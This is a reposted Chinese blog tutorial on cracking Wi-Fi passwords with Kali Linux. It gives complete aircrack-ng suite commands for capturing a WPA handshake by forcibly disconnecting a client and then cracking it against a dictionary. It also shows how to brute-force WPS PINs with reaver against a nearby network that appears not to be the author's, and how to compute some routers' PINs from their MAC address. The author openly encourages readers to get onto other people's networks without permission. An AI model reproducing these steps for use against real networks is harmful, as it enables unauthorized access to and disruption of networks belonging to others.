【转】利用kali破解wifi密码全过程
原文地址:http://www.secbox.cn/hacker/wireless/4877.html?utm_source=tuicool&utm_medium=referral
作者:黑色天使
QQ:1120620069
博客:http://love-lcy.blog.163.com/
团队:安全盒子
———————————————————————————————————————————————————————————
工具:
1:笔记本
2:USB无线网卡(必备)
3:kali系统
4:靠谱字典
第一种方法:
暴力破解法
何为暴力破解呢,其实就是一个一个密码试,直到正确的密码为止。
现在的wifi一般加密都是:
1、不启用安全2、WEP
3、WPA/WPA2-PSK(预共享密钥)
4、WPA/WPA2 802.1X (radius认证)
进入正题:
第一步:
进入kali启动终端输入如下:
root@kali:~# airmon-ng
看看网卡信息
第二步:
输入:
airmon-ng start wlan0
监听窗口
第三步:
输入:
airodump-ng mon0
扫描wifi信号
这里我用自己家wifi做实验
第四步:
这是我家wifi:
上图可以看出
BSSID是00:0F:32:A0:99:DC 信道(CH)是:1
输入:
airodump-ng -w freedom -c CH --bssid 00:0F:32:A0:99:DC mon0 --ignore-negative-one
解释:CH表示信道,信道是多少就填多少,freedom是一会抓握手包的文件名字,他会自动生成一个freedom.cap的文件,这个名字随便你们填什么
00:0F:32:A0:99:DC 64:5A:04:BB:54:57 -4 0e- 0e 0 400
00:0F:32:A0:99:DC 这个是路由器的mac
64:5A:04:BB:54:57 这个是客户端的mac
第五步:
重新开一个客户端输入命令:
aireplay-ng --deaut 10 -a 00:0F:32:A0:99:DC -c 64:5A:04:BB:54:57 mon0 --ignore-negative-one
掉线了,当我们重新连接抓到握手包
第六步:
破解握手包:
命令如下:
aircrack-ng -w mi freedom-*.cap
解释:mi字典名字 freedom-*.cap
abc123abc这个就是我的wifi密码
破解完成,成功与否靠强大的字典和运气了,希望各位亲们蹭网愉快!!!
第二种:通过pin码破解
这个方法很简单:
第一步:Wash 扫描开启WPS的网络。
wash -i mon1 –C
小编的周围没有开启wps功能我wifi,就会出现上图那样,这样咋办呢
不要急,因为有些隐藏了起来,我们直接霸王硬上弓
用前面那个扫wifi的命令:
airodump-ng mon0
看见小编圈起来的mac没有,选择一个PWR的值的绝对值小于70的wifi破解
第二步:
我在这选择的是名字为:FAST_F70E的wifi
就他了:E4:D3:32:7F:F7:0E -45 2 0 0 6 54e. WPA2 CCMP PSK FAST_F70E
然后命令如下:
reaver -i mon0 -b E4:D3:32:7F:F7:0E -a -S -vv
E4:D3:32:7F:F7:0E 这个mac根据路由器的mac更改,我破解的wifi的mac是E4:D3:32:7F:F7:0E
如图上表示可以破解,开启了wps功能
出现上图这样,就表示不能破解换其他wifi破解吧孩子
这样就表示破解出来了
小知识:
如果密码被改了你知道他wifi的pin码就用如下命令:reaver-i mon0 -b MAC -p PIN
pin码有8位:所以就是10的8次方,要穷举1000000000次
这样pin也是有限制的,比如要被pin出的路由器必须得开启wps功能;貌似现在很多都是防pin路由器或300秒pin限制的。
有些路由pin码可以通过计算得到:腾达和磊科的产品如果路由MAC地址是以“C83A35”或“00B00C”打头那么可以直接计算出PIN值。
比如这个:bssid :Tenda_579A18 mac :C8:3A:35:57:9A:18 通过计算器将mac后6位换算成10进制数,得到5741080(pin码的前7位),最多试10次或通过软件得到该路由pin码!
破解时推荐这个命令:
reaver -i mon0 -b E4:D3:32:7F:F7:0E -a -S –d9 –t9 -vv
因为–d9 –t9参数可以防止pin死路由器。
全文到此结束
【转】利用kali破解wifi密码全过程相关推荐
- kali破解wifi密码(wpa/wpa2)
kali破解wifi密码(wpa/wpa2) 实验材料: 1:一台装有kali的电脑或虚拟机(这里我用的是物理机) 2:一块支持监听的无线网卡(淘宝上30元就能买到) 3:你的智商在线 第一步: 插入 ...
- 思路+源码,利用Python破解WIFI密码详解,100M的字典已备好
前言 WIFI破解,Python程序员必学技能.WIFI已经完全普及,现在Python程序员没网,走到哪里都不怕! 很多人学习python,不知道从何学起. 很多人学习python,掌握了基本语法过后 ...
- kali破解Wi-Fi密码
kali系统接入无线网卡,通过监听周围热点,选择一个Wi-Fi热点,攻击一台连接了该Wi-Fi热点的设备,使它掉线之后这台设备会再次主动连接,用伪装的挂载设备去接受设备发送的tcp三次握手数据包.只要 ...
- 总结运用kali破解WIFI密码的多种方法
准备 1.kali专用无线网卡 2.kali系统(无线网卡的连接:1.点击虚拟机-设置-USB控制器 2.点击虚拟机-可移动电源-Ruling 802.11n WLAN) 一.运用airmon-ng ...
- 利用kail破解wifi密码2021
一.打开VMware虚拟机里面安装好的Kali系统插入无线网卡:虚拟机 -> 可移动设备 -> 选择那个有WLAN名称的就是你所插入网卡名称的设备进行连接一般后面都会有某某WLAN -&g ...
- 利用kali获取wifi密码
前期准备:无线网卡(某宝三十多买一个kali免驱的,笔记本中的无线网卡,kali没办法读取).kali(一个linux系统) 原理:利用airmon-ng去开启监听,airodump-ng抓取握手包( ...
- 如何使用Kali破解WIFI密码蹭网?
1.下载Kali Linux (http://cdimage.kali.org/kali-2020.3/) () 2.安装配置Kali Linux (https://www.toutiao.com/a ...
- 利用aircrack-ng破解WIFI密码
本文摘录于:https://www.cnblogs.com/thespace/p/12750450.html只是做学习备份之用,绝无抄袭之意,有疑惑请联系本人! 补充文章:https://blog.c ...
- 用Kali破解WiFi密码——以攻为守,发现自己网络的破绽,提升安全性
安装虚拟机
最新文章
- 《自然》重磅:清华团队首次提出“类脑计算完备性”,智源学者张悠慧等为共同一作...
- 【数据结构与算法】之深入解析“缺失的第一个正数”的求解思路与算法示例
- python线性输出_python sklearn-02:线性回归简单例子1
- 免费直播| TDD如何颠覆了我对开发的认知?
- MMSegmentation:标准统一的语义分割框架
- 实战分享:activemq 在灾备双活建设中的研究
- Android - Enable fullscreen mode
- XMAN misc writeup
- 如何按照滑环的原理来自制简易导电滑环
- 使用RecyclerView实现列表展开动画
- 关于一张出库单开具了多张发票的错误处理
- ViewDragHelper实战,实现滑动解锁
- RandomForest 随机森林算法与模型参数的调优
- 图的广度优先搜索--python实现
- Android开发——进程间通信之AIDL(一)
- 全球及中国模板打印机行业商业模式分析及投资风险预测2022年版
- 如何使用cocos2dx3.0制作基于tilemap的游戏:第二部分
- 罗斯蒙特3051变送器8大方法教你如何选型
- 手机端页面可左拉问题
- 莱阳计算机类专科大学,莱阳市两所高校介绍
热门文章
- 路由器dhcp服务异常不能上网_路由器dhcp服务异常 关于路由器dhcp服务异常怎么办?...
- 简易网页制作之内网穿透工具
- 淘宝哪些词属于夸大宣传的违规词语?
- 基于xilinx vivado的GTX/GTP ip核设置与例程代码使用详解
- gym安装box2d遇到的问题
- Web3.0好在哪里?与IPFS有什么关系?
- 阿波龙发布一周年,百度无人驾驶从“开放”走向 “共赢”
- Verilator简介与使用
- 中国黑客报告:年薪百万、黑色产业与犯罪风险
- 怎么设置html自动翻页,看小说怎么设置自动翻页 设置自动翻页方法介绍